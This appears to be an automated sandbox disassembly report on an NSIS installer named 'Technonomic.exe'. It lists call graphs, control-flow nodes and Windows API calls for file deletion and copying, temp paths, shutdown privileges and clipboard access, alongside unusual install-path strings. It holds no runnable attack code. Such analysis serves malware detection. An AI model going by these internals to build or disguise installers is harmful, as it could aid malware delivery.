API calls 3747->3750 3754 40140b 2 API calls 3748->3754 3748->3756 3752 403c26 GetClassInfoW RegisterClassW 3749->3752 3753 403c3c DialogBoxParamW 3749->3753 3750->3756 3751->3749 3752->3753 3755 40140b 2 API calls 3753->3755 3754->3756 3755->3756 3756->3591 3757->3595 3821 406183 lstrcpynW 3758->3821 3760 405c50 3822 405be2 CharNextW CharNextW 3760->3822 3763 4036d9 3763->3591 3772 406183 lstrcpynW 3763->3772 3764 406417 5 API calls 3770 405c66 3764->3770 3765 405c97 lstrlenW 3766 405ca2 3765->3766 3765->3770 3767 405b37 3 API calls 3766->3767 3769 405ca7 GetFileAttributesW 3767->3769 3768 4064c6 2 API calls 3768->3770 3769->3763 3770->3763 3770->3765 3770->3768 3771 405b83 2 API calls 3770->3771 3771->3765 3772->3627 3773->3596 3775 4038f5 3774->3775 3776 4038eb CloseHandle 3774->3776 3777 403909 3775->3777 3778 4038ff CloseHandle 3775->3778 3776->3775 3828 403937 3777->3828 3778->3777 3784 406559 5 API calls 3783->3784 3785 403739 lstrcatW 3784->3785 3785->3621 3785->3622 3787 405802 GetLastError 3786->3787 3788 40377b 3786->3788 3787->3788 3789 405811 SetFileSecurityW 3787->3789 3788->3635 3789->3788 3790 405827 GetLastError 3789->3790 3790->3788 3792 405842 GetLastError 3791->3792 3793 40583e 3791->3793 3792->3793 3793->3635 3794->3637 3795->3647 3797 406038 3796->3797 3799 406045 3796->3799 3882 405eb2 lstrcpyW 3797->3882 3799->3647 3800->3673 3801->3675 3803 405b91 3802->3803 3804 402ead 3803->3804 3805 405b97 CharPrevW 3803->3805 3806 406183 lstrcpynW 3804->3806 3805->3803 3805->3804 3806->3679 3807->3697 3808->3689 3810 403cb6 3809->3810 3820 4060ca wsprintfW 3810->3820 3812 403d27 3813 4061a5 18 API calls 3812->3813 3814 403d33 SetWindowTextW 3813->3814 3815 403a57 3814->3815 3816 403d4f 3814->3816 3815->3714 3816->3815 3817 4061a5 18 API calls 3816->3817 3817->3816 3818->3710 3819->3716 3820->3812 3821->3760 3823 405bff 3822->3823 3825 405c11 3822->3825 3823->3825 3826 405c0c CharNextW 3823->3826 3824 405c35 3824->3763 3824->3764 3825->3824 3827 405b64 CharNextW 3825->3827 3826->3824 3827->3825 3829 403945 3828->3829 3830 40390e 3829->3830 3831 40394a FreeLibrary GlobalFree 3829->3831 3832 405974 3830->3832 3831->3830 3831->3831 3833 405c3f 18 API calls 3832->3833 3834 405994 3833->3834 3835 4059b3 3834->3835 3836 40599c DeleteFileW 3834->3836 3839 405ade 3835->3839 3872 406183 lstrcpynW 3835->3872 3837 40370c OleUninitialize 3836->3837 3837->3603 3837->3604 3839->3837 3845 4064c6 2 API calls 3839->3845 3840 4059d9 3841 4059ec 3840->3841 3842 4059df lstrcatW 3840->3842 3844 405b83 2 API calls 3841->3844 3843 4059f2 3842->3843 3846 405a02 lstrcatW 3843->3846 3847 4059f8 3843->3847 3844->3843 3848 405af8 3845->3848 3849 405a0d lstrlenW FindFirstFileW 3846->3849 3847->3846 3847->3849 3848->3837 3850 405afc 3848->3850 3851 405ad3 3849->3851 3870 405a2f 3849->3870 3852 405b37 3 API calls 3850->3852 3851->3839 3853 405b02 3852->3853 3855 40592c 5 API calls 3853->3855 3854 405ab6 FindNextFileW 3857 405acc FindClose 3854->3857 3854->3870 3858 405b0e 3855->3858 3857->3851 3859 405b12 3858->3859 3860 405b28 3858->3860 3859->3837 3863 4052e2 25 API calls 3859->3863 3862 4052e2 25 API calls 3860->3862 3862->3837 3865 405b1f 3863->3865 3864 405974 62 API calls 3864->3870 3867 406024 38 API calls 3865->3867 3866 4052e2 25 API calls 3866->3854 3868 405b26 3867->3868 3868->3837 3869 4052e2 25 API calls 3869->3870 3870->3854 3870->3864 3870->3866 3870->3869 3871 406024 38 API calls 3870->3871 3873 406183 lstrcpynW 3870->3873 3874 40592c 3870->3874 3871->3870 3872->3840 3873->3870 3875 405d33 2 API calls 3874->3875 3876 405938 3875->3876 3877 405947 RemoveDirectoryW 3876->3877 3878 40594f DeleteFileW 3876->3878 3880 405959 3876->3880 3879 405955 3877->3879 3878->3879 3879->3880 3881 405965 SetFileAttributesW 3879->3881 3880->3870 3881->3880 3883 405f00 GetShortPathNameW 3882->3883 3884 405eda 3882->3884 3886 405f15 3883->3886 3887 40601f 3883->3887 3909 405d58 GetFileAttributesW CreateFileW 3884->3909 3886->3887 3889 405f1d wsprintfA 3886->3889 3887->3799 3888 405ee4 CloseHandle GetShortPathNameW 3888->3887 3890 405ef8 3888->3890 3891 4061a5 18 API calls 3889->3891 3890->3883 3890->3887 3892 405f45 3891->3892 3910 405d58 GetFileAttributesW CreateFileW 3892->3910 3894 405f52 3894->3887 3895 405f61 GetFileSize GlobalAlloc 3894->3895 3896 405f83 3895->3896 3897 406018 CloseHandle 3895->3897 3898 405ddb ReadFile 3896->3898 3897->3887 3899 405f8b 3898->3899 3899->3897 3911 405cbd lstrlenA 3899->3911 3902 405fa2 lstrcpyA 3906 405fc4 3902->3906 3903 405fb6 3904 405cbd 4 API calls 3903->3904 3904->3906 3905 405ffb SetFilePointer 3907 405e0a WriteFile 3905->3907 3906->3905 3908 406011 GlobalFree 3907->3908 3908->3897 3909->3888 3910->3894 3912 405cfe lstrlenA 3911->3912 3913 405d06 3912->3913 3914 405cd7 lstrcmpiA 3912->3914 3913->3902 3913->3903 3914->3913 3915 405cf5 CharNextA 3914->3915 3915->3912 4607 401b37 4608 401b44 4607->4608 4609 401b88 4607->4609 4612 401bcd 4608->4612 4617 401b5b 4608->4617 4610 401bb2 GlobalAlloc 4609->4610 4611 401b8d 4609->4611 4613 4061a5 18 API calls 4610->4613 4625 402288 4611->4625 4628 406183 lstrcpynW 4611->4628 4614 4061a5 18 API calls 4612->4614 4612->4625 4613->4612 4616 402282 4614->4616 4620 4058c8 MessageBoxIndirectW 4616->4620 4626 406183 lstrcpynW 4617->4626 4618 401b9f GlobalFree 4618->4625 4620->4625 4621 401b6a 4627 406183 lstrcpynW 4621->4627 4623 401b79 4629 406183 lstrcpynW 4623->4629 4626->4621 4627->4623 4628->4618 4629->4625 4630 402537 4631 402562 4630->4631 4632 40254b 4630->4632 4634 402596 4631->4634 4635 402567 4631->4635 4633 402ba2 18 API calls 4632->4633 4642 402552 4633->4642 4637 402bbf 18 API calls 4634->4637 4636 402bbf 18 API calls 4635->4636 4638 40256e WideCharToMultiByte lstrlenA 4636->4638 4639 40259d lstrlenW 4637->4639 4638->4642 4639->4642 4640 4025e0 4641 405e0a WriteFile 4641->4640 4642->4640 4643 405e39 5 API calls 4642->4643 4644 4025ca 4642->4644 4643->4644 4644->4640 4644->4641 4645 404a38 4646 404a64 4645->4646 4647 404a48 4645->4647 4649 404a97 4646->4649 4650 404a6a SHGetPathFromIDListW 4646->4650 4656 4058ac GetDlgItemTextW 4647->4656 4652 404a81 SendMessageW 4650->4652 4653 404a7a 4650->4653 4651 404a55 SendMessageW 4651->4646 4652->4649 4655 40140b 2 API calls 4653->4655 4655->4652 4656->4651 4657 4014b8 4658 4014be 4657->4658 4659 401389 2 API calls 4658->4659 4660 4014c6 4659->4660 3916 4015b9 3917 402bbf 18 API calls 3916->3917 3918 4015c0 3917->3918 3919 405be2 4 API calls 3918->3919 3932 4015c9 3919->3932 3920 401629 3922 40165b 3920->3922 3923 40162e 3920->3923 3921 405b64 CharNextW 3921->3932 3925 401423 25 API calls 3922->3925 3924 401423 25 API calls 3923->3924 3926 401635 3924->3926 3931 401653 3925->3931 3935 406183 lstrcpynW 3926->3935 3927 40582e 2 API calls 3927->3932 3929 401642 SetCurrentDirectoryW 3929->3931 3930 40584b 5 API calls 3930->3932 3932->3920 3932->3921 3932->3927 3932->3930 3933 40160f GetFileAttributesW 3932->3933 3934 4057b1 4 API calls 3932->3934 3933->3932 3934->3932 3935->3929 4668 40293b 4669 402ba2 18 API calls 4668->4669 4670 402941 4669->4670 4671 402964 4670->4671 4672 40297d 4670->4672 4677 40281e 4670->4677 4675 402969 4671->4675 4676 40297a 4671->4676 4673 402993 4672->4673 4674 402987 4672->4674 4679 4061a5 18 API calls 4673->4679 4678 402ba2 18 API calls 4674->4678 4682 406183 lstrcpynW 4675->4682 4683 4060ca wsprintfW 4676->4683 4678->4677 4679->4677 4682->4677 4683->4677

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 4033b6-4033e8 SetErrorMode GetVersion 1 4033ea-4033f2 call 406559 0->1 2 4033fb-40348e call 4064ed * 3 call 406559 * 2 #17 OleInitialize SHGetFileInfoW call 406183 GetCommandLineW call 406183 GetModuleHandleW 0->2 1->2 8 4033f4 1->8 20 403490-403497 2->20 21 403498-4034b2 call 405b64 CharNextW 2->21 8->2 20->21 24 4034b8-4034be 21->24 25 4035ca-4035e4 GetTempPathW call 403385 21->25 26 4034c0-4034c5 24->26 27 4034c7-4034cd 24->27 34 4035e6-403604 GetWindowsDirectoryW lstrcatW call 403385 25->34 35 40363c-403656 DeleteFileW call 402e41 25->35 26->26 26->27 29 4034d4-4034d8 27->29 30 4034cf-4034d3 27->30 32 403596-4035a3 call 405b64 29->32 33 4034de-4034e4 29->33 30->29 48 4035a5-4035a6 32->48 49 4035a7-4035ad 32->49 38 4034e6-4034ed 33->38 39 4034fe-403537 33->39 34->35 54 403606-403636 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403385 34->54 50 403707-403718 call 4038da OleUninitialize 35->50 51 40365c-403662 35->51 43 4034f4 38->43 44 4034ef-4034f2 38->44 45 403554-40358e 39->45 46 403539-40353e 39->46 43->39 44->39 44->43 45->32 53 403590-403594 45->53 46->45 52 403540-403548 46->52 48->49 49->24 57 4035b3 49->57 71 40383e-403844 50->71 72 40371e-40372e call 4058c8 ExitProcess 50->72 58 4036f7-4036fe call 4039cc 51->58 59 403668-403673 call 405b64 51->59 61 40354a-40354d 52->61 62 40354f 52->62 53->32 55 4035b5-4035c3 call 406183 53->55 54->35 54->50 64 4035c8 55->64 57->64 70 403703 58->70 75 4036c1-4036cb 59->75 76 403675-4036aa 59->76 61->45 61->62 62->45 64->25 70->50 73 4038c2-4038ca 71->73 74 403846-40385c GetCurrentProcess OpenProcessToken 71->74 81 4038d0-4038d4 ExitProcess 73->81 82 4038cc 73->82 78 403892-4038a0 call 406559 74->78 79 40385e-40388c LookupPrivilegeValueW AdjustTokenPrivileges 74->79 83 403734-403748 call 40584b lstrcatW 75->83 84 4036cd-4036db call 405c3f 75->84 80 4036ac-4036b0 76->80 98 4038a2-4038ac 78->98 99 4038ae-4038b9 ExitWindowsEx 78->99 79->78 89 4036b2-4036b7 80->89 90 4036b9-4036bd 80->90 82->81 96 403755-40376f lstrcatW lstrcmpiW 83->96 97 40374a-403750 lstrcatW 83->97 84->50 95 4036dd-4036f3 call 406183 * 2 84->95 89->90 94 4036bf 89->94 90->80 90->94 94->75 95->58 96->50 101 403771-403774 96->101 97->96 98->99 102 4038bb-4038bd call 40140b 98->102 99->73 99->102 104 403776-40377b call 4057b1 101->104 105 40377d call 40582e 101->105 102->73 113 403782-403790 SetCurrentDirectoryW 104->113 105->113 114 403792-403798 call 406183 113->114 115 40379d-4037c6 call 406183 113->115 114->115 119 4037cb-4037e7 call 4061a5 DeleteFileW 115->119 122 403828-403830 119->122 123 4037e9-4037f9 CopyFileW 119->123 122->119 125 403832-403839 call 406024 122->125 123->122 124 4037fb-40381b call 406024 call 4061a5 call 405863 123->124 124->122 134 40381d-403824 CloseHandle 124->134 125->50 134->122
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 004033D8
                                                                                                                                                                      • GetVersion.KERNEL32 ref: 004033DE
                                                                                                                                                                      • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403435
                                                                                                                                                                      • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
                                                                                                                                                                      • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Technonomic.exe",00000000), ref: 00403479
                                                                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Technonomic.exe",00000020), ref: 004034A0
                                                                                                                                                                        • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                                                                        • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035DB
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035EC
                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F8
                                                                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040360C
                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403614
                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403625
                                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040362D
                                                                                                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 00403641
                                                                                                                                                                        • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                                                                                      • OleUninitialize.OLE32(?), ref: 0040370C
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040372E
                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Technonomic.exe",00000000,?), ref: 00403741
                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Technonomic.exe",00000000,?), ref: 00403750
                                                                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Technonomic.exe",00000000,?), ref: 0040375B
                                                                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Technonomic.exe",00000000,?), ref: 00403767
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403783
                                                                                                                                                                      • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
                                                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Technonomic.exe,00420F08,00000001), ref: 004037F1
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403854
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004038D4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Technonomic.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable$C:\Users\user\Desktop$C:\Users\user\Desktop\Technonomic.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                                                      • API String ID: 3586999533-2641074325
                                                                                                                                                                      • Opcode ID: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
                                                                                                                                                                      • Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
                                                                                                                                                                      • Opcode Fuzzy Hash: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 135 405421-40543c 136 405442-405509 GetDlgItem * 3 call 40427c call 404b7f GetClientRect GetSystemMetrics SendMessageW * 2 135->136 137 4055cb-4055d2 135->137 158 405527-40552a 136->158 159 40550b-405525 SendMessageW * 2 136->159 139 4055d4-4055f6 GetDlgItem CreateThread CloseHandle 137->139 140 4055fc-405609 137->140 139->140 142 405627-405631 140->142 143 40560b-405611 140->143 147 405633-405639 142->147 148 405687-40568b 142->148 145 405613-405622 ShowWindow * 2 call 40427c 143->145 146 40564c-405655 call 4042ae 143->146 145->142 155 40565a-40565e 146->155 153 405661-405671 ShowWindow 147->153 154 40563b-405647 call 404220 147->154 148->146 151 40568d-405693 148->151 151->146 160 405695-4056a8 SendMessageW 151->160 156 405681-405682 call 404220 153->156 157 405673-40567c call 4052e2 153->157 154->146 156->148 157->156 164 40553a-405551 call 404247 158->164 165 40552c-405538 SendMessageW 158->165 159->158 166 4057aa-4057ac 160->166 167 4056ae-4056d9 CreatePopupMenu call 4061a5 AppendMenuW 160->167 174 405553-405567 ShowWindow 164->174 175 405587-4055a8 GetDlgItem SendMessageW 164->175 165->164 166->155 172 4056db-4056eb GetWindowRect 167->172 173 4056ee-405703 TrackPopupMenu 167->173 172->173 173->166 176 405709-405720 173->176 177 405576 174->177 178 405569-405574 ShowWindow 174->178 175->166 179 4055ae-4055c6 SendMessageW * 2 175->179 180 405725-405740 SendMessageW 176->180 181 40557c-405582 call 40427c 177->181 178->181 179->166 180->180 182 405742-405765 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->182 181->175 184 405767-40578e SendMessageW 182->184 184->184 185 405790-4057a4 GlobalUnlock SetClipboardData CloseClipboard 184->185 185->166
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040547F
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040548E
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004054CB
                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004054D2
                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040556E
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040558F
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040549D
                                                                                                                                                                        • Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055E1
                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004055F6
                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040561A
                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040561F
                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405669
                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004056AE
                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004056E2
                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405743
                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405749
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040575F
                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405793
                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
                                                                                                                                                                      • CloseClipboard.USER32 ref: 004057A4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                      • String ID: H7B${
                                                                                                                                                                      • API String ID: 590372296-2256286769
                                                                                                                                                                      • Opcode ID: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
                                                                                                                                                                      • Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
                                                                                                                                                                      • Opcode Fuzzy Hash: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
                                                                                                                                                                      • Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 434 4061a5-4061b0 435 4061b2-4061c1 434->435 436 4061c3-4061d9 434->436 435->436 437 4063f1-4063f7 436->437 438 4061df-4061ec 436->438 439 4063fd-406408 437->439 440 4061fe-40620b 437->440 438->437 441 4061f2-4061f9 438->441 442 406413-406414 439->442 443 40640a-40640e call 406183 439->443 440->439 444 406211-40621d 440->444 441->437 443->442 446 406223-40625f 444->446 447 4063de 444->447 448 406265-406270 GetVersion 446->448 449 40637f-406383 446->449 450 4063e0-4063ea 447->450 451 4063ec-4063ef 447->451 452 406272-406276 448->452 453 40628a 448->453 454 406385-406389 449->454 455 4063b8-4063bc 449->455 450->437 451->437 452->453 456 406278-40627c 452->456 459 406291-406298 453->459 457 406399-4063a6 call 406183 454->457 458 40638b-406397 call 4060ca 454->458 460 4063cb-4063dc lstrlenW 455->460 461 4063be-4063c6 call 4061a5 455->461 456->453 462 40627e-406282 456->462 472 4063ab-4063b4 457->472 458->472 464 40629a-40629c 459->464 465 40629d-40629f 459->465 460->437 461->460 462->453 468 406284-406288 462->468 464->465 470 4062a1-4062be call 406050 465->470 471 4062db-4062de 465->471 468->459 480 4062c3-4062c7 470->480 475 4062e0-4062ec GetSystemDirectoryW 471->475 476 4062ee-4062f1 471->476 472->460 474 4063b6 472->474 481 406377-40637d call 406417 474->481 477 406360-406364 475->477 478 4062f3-406301 GetWindowsDirectoryW 476->478 479 40635c-40635e 476->479 477->481 483 406366-40636a 477->483 478->479 479->477 482 406303-40630d 479->482 480->483 484 4062cd-4062d6 call 4061a5 480->484 481->460 487 406327-40633d SHGetSpecialFolderLocation 482->487 488 40630f-406312 482->488 483->481 490 40636c-406372 lstrcatW 483->490 484->477 492 406358 487->492 493 40633f-406356 SHGetPathFromIDListW CoTaskMemFree 487->493 488->487 491 406314-40631b 488->491 490->481 495 406323-406325 491->495 492->479 493->477 493->492 495->477 495->487
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersion.KERNEL32(00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 00406268
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004062E6
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004062F9
                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406343
                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0040634E
                                                                                                                                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
